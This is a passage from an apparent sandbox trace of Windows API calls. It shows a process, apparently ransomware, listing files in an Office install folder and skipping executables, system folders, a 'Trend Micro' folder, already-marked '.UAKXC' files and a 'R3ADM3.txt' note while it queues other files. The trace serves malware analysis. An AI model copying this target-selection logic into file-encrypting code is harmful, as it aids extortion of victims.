nFileSizeLow=0x3c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Graph.exe.manifest", cAlternateFileName="GRAPHE~1.MAN")) returned 1 [0158.787] lstrcmpW (lpString1="Graph.exe.manifest", lpString2=".") returned 1 [0158.787] lstrcmpW (lpString1="Graph.exe.manifest", lpString2="..") returned 1 [0158.787] StrStrIW (lpFirst="Graph.exe.manifest", lpSrch=".UAKXC") returned 0x0 [0158.787] StrStrIW (lpFirst="Graph.exe.manifest", lpSrch=".exe") returned=".exe.manifest" [0158.787] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32f5d600, ftCreationTime.dwHighDateTime=0x1c3b950, ftLastAccessTime.dwLowDateTime=0x61a91a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x32f5d600, ftLastWriteTime.dwHighDateTime=0x1c3b950, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRAPH.ICO", cAlternateFileName="")) returned 1 [0158.787] lstrcmpW (lpString1="GRAPH.ICO", lpString2=".") returned 1 [0158.787] lstrcmpW (lpString1="GRAPH.ICO", lpString2="..") returned 1 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch=".UAKXC") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch=".exe") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch=".dll") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch=".lnk") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch=".sys") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch=".msi") returned 0x0 [0158.787] StrStrIW (lpFirst="GRAPH.ICO", lpSrch="R3ADM3.txt") returned 0x0 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c28 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.787] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.787] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.787] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0c28 | out: hHeap=0xea0000) returned 1 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef98a8 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c28 [0158.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9998 [0158.788] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef98a8 | out: hHeap=0xea0000) returned 1 [0158.788] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.788] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x582abeb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x582abeb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Groove", cAlternateFileName="")) returned 1 [0158.788] lstrcmpW (lpString1="Groove", lpString2=".") returned 1 [0158.788] lstrcmpW (lpString1="Groove", lpString2="..") returned 1 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="tmp") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="winnt") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="temp") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="thumb") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="$Recycle.Bin") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="System Volume Information") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="Boot") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="Windows") returned 0x0 [0158.788] StrStrIW (lpFirst="Groove", lpSrch="Trend Micro") returned 0x0 [0158.788] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.788] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.788] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.788] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.788] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.788] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c50 [0158.788] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef98a8 [0158.788] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.788] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6fd7600, ftCreationTime.dwHighDateTime=0x1cacbb3, ftLastAccessTime.dwLowDateTime=0x52fce0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6fd7600, ftLastWriteTime.dwHighDateTime=0x1cacbb3, nFileSizeHigh=0x0, nFileSizeLow=0x3112b78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0158.788] lstrcmpW (lpString1="GROOVE.EXE", lpString2=".") returned 1 [0158.789] lstrcmpW (lpString1="GROOVE.EXE", lpString2="..") returned 1 [0158.789] StrStrIW (lpFirst="GROOVE.EXE", lpSrch=".UAKXC") returned 0x0 [0158.789] StrStrIW (lpFirst="GROOVE.EXE", lpSrch=".exe") returned=".EXE" [0158.789] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6fd7600, ftCreationTime.dwHighDateTime=0x1cacbb3, ftLastAccessTime.dwLowDateTime=0x61c80c70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6fd7600, ftLastWriteTime.dwHighDateTime=0x1cacbb3, nFileSizeHigh=0x0, nFileSizeLow=0x669390, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GROOVEEX.DLL", cAlternateFileName="")) returned 1 [0158.789] lstrcmpW (lpString1="GROOVEEX.DLL", lpString2=".") returned 1 [0158.789] lstrcmpW (lpString1="GROOVEEX.DLL", lpString2="..") returned 1 [0158.789] StrStrIW (lpFirst="GROOVEEX.DLL", lpSrch=".UAKXC") returned 0x0 [0158.789] StrStrIW (lpFirst="GROOVEEX.DLL", lpSrch=".exe") returned 0x0 [0158.789] StrStrIW (lpFirst="GROOVEEX.DLL", lpSrch=".dll") returned=".DLL" [0158.789] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c91e000, ftCreationTime.dwHighDateTime=0x1cacb46, ftLastAccessTime.dwLowDateTime=0x52fce0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c91e000, ftLastWriteTime.dwHighDateTime=0x1cacb46, nFileSizeHigh=0x0, nFileSizeLow=0x14ed88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GROOVEMN.EXE", cAlternateFileName="")) returned 1 [0158.789] lstrcmpW (lpString1="GROOVEMN.EXE", lpString2=".") returned 1 [0158.789] lstrcmpW (lpString1="GROOVEMN.EXE", lpString2="..") returned 1 [0158.789] StrStrIW (lpFirst="GROOVEMN.EXE", lpSrch=".UAKXC") returned 0x0 [0158.789] StrStrIW (lpFirst="GROOVEMN.EXE", lpSrch=".exe") returned=".EXE" [0158.789] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd0360920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x91b68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HVAC.DLL", cAlternateFileName="")) returned 1 [0158.789] lstrcmpW (lpString1="HVAC.DLL", lpString2=".") returned 1 [0158.789] lstrcmpW (lpString1="HVAC.DLL", lpString2="..") returned 1 [0158.789] StrStrIW (lpFirst="HVAC.DLL", lpSrch=".UAKXC") returned 0x0 [0158.789] StrStrIW (lpFirst="HVAC.DLL", lpSrch=".exe") returned 0x0 [0158.789] StrStrIW (lpFirst="HVAC.DLL", lpSrch=".dll") returned=".DLL" [0158.789] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50eeca00, ftCreationTime.dwHighDateTime=0x1cbceff, ftLastAccessTime.dwLowDateTime=0xcf0a1be0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50eeca00, ftLastWriteTime.dwHighDateTime=0x1cbceff, nFileSizeHigh=0x0, nFileSizeLow=0x3b360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEAWSDC.DLL", cAlternateFileName="")) returned 1 [0158.789] lstrcmpW (lpString1="IEAWSDC.DLL", lpString2=".") returned 1 [0158.790] lstrcmpW (lpString1="IEAWSDC.DLL", lpString2="..") returned 1 [0158.790] StrStrIW (lpFirst="IEAWSDC.DLL", lpSrch=".UAKXC") returned 0x0 [0158.790] StrStrIW (lpFirst="IEAWSDC.DLL", lpSrch=".exe") returned 0x0 [0158.790] StrStrIW (lpFirst="IEAWSDC.DLL", lpSrch=".dll") returned=".DLL" [0158.790] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82531f00, ftCreationTime.dwHighDateTime=0x1cab7f0, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82531f00, ftLastWriteTime.dwHighDateTime=0x1cab7f0, nFileSizeHigh=0x0, nFileSizeLow=0xb13a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEContentService.exe", cAlternateFileName="IECONT~1.EXE")) returned 1 [0158.790] lstrcmpW (lpString1="IEContentService.exe", lpString2=".") returned 1 [0158.790] lstrcmpW (lpString1="IEContentService.exe", lpString2="..") returned 1 [0158.790] StrStrIW (lpFirst="IEContentService.exe", lpSrch=".UAKXC") returned 0x0 [0158.790] StrStrIW (lpFirst="IEContentService.exe", lpSrch=".exe") returned=".exe" [0158.790] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd58c5e60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xa6190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMCOMMON.DLL", cAlternateFileName="")) returned 1 [0158.790] lstrcmpW (lpString1="IMCOMMON.DLL", lpString2=".") returned 1 [0158.790] lstrcmpW (lpString1="IMCOMMON.DLL", lpString2="..") returned 1 [0158.790] StrStrIW (lpFirst="IMCOMMON.DLL", lpSrch=".UAKXC") returned 0x0 [0158.790] StrStrIW (lpFirst="IMCOMMON.DLL", lpSrch=".exe") returned 0x0 [0158.790] StrStrIW (lpFirst="IMCOMMON.DLL", lpSrch=".dll") returned=".DLL" [0158.790] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5dc7c00, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x820ca2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb5dc7c00, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x73c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMDIMP.ADD", cAlternateFileName="")) returned 1 [0158.790] lstrcmpW (lpString1="IMDIMP.ADD", lpString2=".") returned 1 [0158.790] lstrcmpW (lpString1="IMDIMP.ADD", lpString2="..") returned 1 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch=".UAKXC") returned 0x0 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch=".exe") returned 0x0 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch=".dll") returned 0x0 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch=".lnk") returned 0x0 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch=".sys") returned 0x0 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch=".msi") returned 0x0 [0158.790] StrStrIW (lpFirst="IMDIMP.ADD", lpSrch="R3ADM3.txt") returned 0x0 [0158.790] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c78 [0158.790] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0c78 | out: hHeap=0xea0000) returned 1 [0158.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9a10 [0158.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0c78 [0158.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9a88 [0158.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9a10 | out: hHeap=0xea0000) returned 1 [0158.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.791] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1e9b800, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1e9b800, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x2d168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMPMAIL.DLL", cAlternateFileName="")) returned 1 [0158.791] lstrcmpW (lpString1="IMPMAIL.DLL", lpString2=".") returned 1 [0158.791] lstrcmpW (lpString1="IMPMAIL.DLL", lpString2="..") returned 1 [0158.791] StrStrIW (lpFirst="IMPMAIL.DLL", lpSrch=".UAKXC") returned 0x0 [0158.791] StrStrIW (lpFirst="IMPMAIL.DLL", lpSrch=".exe") returned 0x0 [0158.791] StrStrIW (lpFirst="IMPMAIL.DLL", lpSrch=".dll") returned=".DLL" [0158.791] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd58ebfc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x2f180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMUTIL.DLL", cAlternateFileName="")) returned 1 [0158.791] lstrcmpW (lpString1="IMUTIL.DLL", lpString2=".") returned 1 [0158.791] lstrcmpW (lpString1="IMUTIL.DLL", lpString2="..") returned 1 [0158.791] StrStrIW (lpFirst="IMUTIL.DLL", lpSrch=".UAKXC") returned 0x0 [0158.791] StrStrIW (lpFirst="IMUTIL.DLL", lpSrch=".exe") returned 0x0 [0158.791] StrStrIW (lpFirst="IMUTIL.DLL", lpSrch=".dll") returned=".DLL" [0158.791] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db63000, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd58ebfc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1db63000, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x38388, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMWDD.DLL", cAlternateFileName="")) returned 1 [0158.791] lstrcmpW (lpString1="IMWDD.DLL", lpString2=".") returned 1 [0158.791] lstrcmpW (lpString1="IMWDD.DLL", lpString2="..") returned 1 [0158.791] StrStrIW (lpFirst="IMWDD.DLL", lpSrch=".UAKXC") returned 0x0 [0158.791] StrStrIW (lpFirst="IMWDD.DLL", lpSrch=".exe") returned 0x0 [0158.791] StrStrIW (lpFirst="IMWDD.DLL", lpSrch=".dll") returned=".DLL" [0158.792] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd5912120, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x3f90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMWIZ.DLL", cAlternateFileName="")) returned 1 [0158.792] lstrcmpW (lpString1="IMWIZ.DLL", lpString2=".") returned 1 [0158.792] lstrcmpW (lpString1="IMWIZ.DLL", lpString2="..") returned 1 [0158.792] StrStrIW (lpFirst="IMWIZ.DLL", lpSrch=".UAKXC") returned 0x0 [0158.792] StrStrIW (lpFirst="IMWIZ.DLL", lpSrch=".exe") returned 0x0 [0158.792] StrStrIW (lpFirst="IMWIZ.DLL", lpSrch=".dll") returned=".DLL" [0158.792] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3501d300, ftCreationTime.dwHighDateTime=0x1cacf91, ftLastAccessTime.dwLowDateTime=0x53979a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3501d300, ftLastWriteTime.dwHighDateTime=0x1cacf91, nFileSizeHigh=0x0, nFileSizeLow=0x275770, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INFOPATH.EXE", cAlternateFileName="")) returned 1 [0158.792] lstrcmpW (lpString1="INFOPATH.EXE", lpString2=".") returned 1 [0158.792] lstrcmpW (lpString1="INFOPATH.EXE", lpString2="..") returned 1 [0158.792] StrStrIW (lpFirst="INFOPATH.EXE", lpSrch=".UAKXC") returned 0x0 [0158.792] StrStrIW (lpFirst="INFOPATH.EXE", lpSrch=".exe") returned=".EXE" [0158.792] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathOM", cAlternateFileName="INFOPA~1")) returned 1 [0158.792] lstrcmpW (lpString1="InfoPathOM", lpString2=".") returned 1 [0158.792] lstrcmpW (lpString1="InfoPathOM", lpString2="..") returned 1 [0158.792] StrStrIW (lpFirst="InfoPathOM", lpSrch="tmp") returned 0x0 [0158.792] StrStrIW (lpFirst="InfoPathOM", lpSrch="winnt") returned 0x0 [0158.792] StrStrIW (lpFirst="InfoPathOM", lpSrch="temp") returned 0x0 [0158.792] StrStrIW (lpFirst="InfoPathOM", lpSrch="thumb") returned 0x0 [0158.792] StrStrIW (lpFirst="InfoPathOM", lpSrch="$Recycle.Bin") returned 0x0 [0159.324] StrStrIW (lpFirst="InfoPathOM", lpSrch="$RECYCLE.BIN") returned 0x0 [0159.324] StrStrIW (lpFirst="InfoPathOM", lpSrch="System Volume Information") returned 0x0 [0159.324] StrStrIW (lpFirst="InfoPathOM", lpSrch="Boot") returned 0x0 [0159.324] StrStrIW (lpFirst="InfoPathOM", lpSrch="Windows") returned 0x0 [0159.324] StrStrIW (lpFirst="InfoPathOM", lpSrch="Trend Micro") returned 0x0 [0159.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0ca0 [0159.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0ca0 | out: hHeap=0xea0000) returned 1 [0159.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0ca0 [0159.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9a10 [0159.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.324] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x61d191f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x7bb78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INLAUNCH.DLL", cAlternateFileName="")) returned 1 [0159.324] lstrcmpW (lpString1="INLAUNCH.DLL", lpString2=".") returned 1 [0159.325] lstrcmpW (lpString1="INLAUNCH.DLL", lpString2="..") returned 1 [0159.325] StrStrIW (lpFirst="INLAUNCH.DLL", lpSrch=".UAKXC") returned 0x0 [0159.325] StrStrIW (lpFirst="INLAUNCH.DLL", lpSrch=".exe") returned 0x0 [0159.325] StrStrIW (lpFirst="INLAUNCH.DLL", lpSrch=".dll") returned=".DLL" [0159.325] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb562a700, ftCreationTime.dwHighDateTime=0x1cacb3f, ftLastAccessTime.dwLowDateTime=0x61e23b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb562a700, ftLastWriteTime.dwHighDateTime=0x1cacb3f, nFileSizeHigh=0x0, nFileSizeLow=0x1bac000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Installed_resources14.xss", cAlternateFileName="INSTAL~1.XSS")) returned 1 [0159.325] lstrcmpW (lpString1="Installed_resources14.xss", lpString2=".") returned 1 [0159.325] lstrcmpW (lpString1="Installed_resources14.xss", lpString2="..") returned 1 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch=".UAKXC") returned 0x0 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch=".exe") returned 0x0 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch=".dll") returned 0x0 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch=".lnk") returned 0x0 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch=".sys") returned 0x0 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch=".msi") returned 0x0 [0159.325] StrStrIW (lpFirst="Installed_resources14.xss", lpSrch="R3ADM3.txt") returned 0x0 [0159.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0159.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0159.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0159.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34cb0 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0cc8 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34e78 [0159.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0159.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.326] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb562a700, ftCreationTime.dwHighDateTime=0x1cacb3f, ftLastAccessTime.dwLowDateTime=0x61e23b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb562a700, ftLastWriteTime.dwHighDateTime=0x1cacb3f, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Installed_schemas14.xss", cAlternateFileName="INSTAL~2.XSS")) returned 1 [0159.326] lstrcmpW (lpString1="Installed_schemas14.xss", lpString2=".") returned 1 [0159.326] lstrcmpW (lpString1="Installed_schemas14.xss", lpString2="..") returned 1 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", lpSrch=".UAKXC") returned 0x0 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", lpSrch=".exe") returned 0x0 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", 